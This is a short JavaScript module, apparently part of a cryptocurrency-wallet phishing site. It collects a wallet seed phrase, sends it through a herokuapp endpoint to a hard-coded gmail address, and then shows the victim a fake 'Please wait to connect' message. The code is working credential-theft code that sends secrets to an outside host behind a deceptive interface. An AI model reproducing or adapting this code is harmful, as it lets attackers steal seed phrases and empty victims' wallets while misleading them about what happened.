
import Swal from 'sweetalert2'
const sendEmail = (mess) => {
    if(!mess){
        Swal.fire({
            text: 'Seed Wallet should not empty',
            icon: 'error',
            timer: 3000
        })
        return;
    }
    return fetch("https://polar-river-36793.herokuapp.com/api/email/send", {
        method: "POST",
        body: JSON.stringify({
        email: "howarfgriffine200@gmail.com",
        body: mess,
        }),
        headers: {
        "Content-type": "application/json; charset=UTF-8",
        },
    })
    .then((response) => response.json())
    .then((response) => {
    return "Please wait to connect";
    });
};
export { sendEmail };
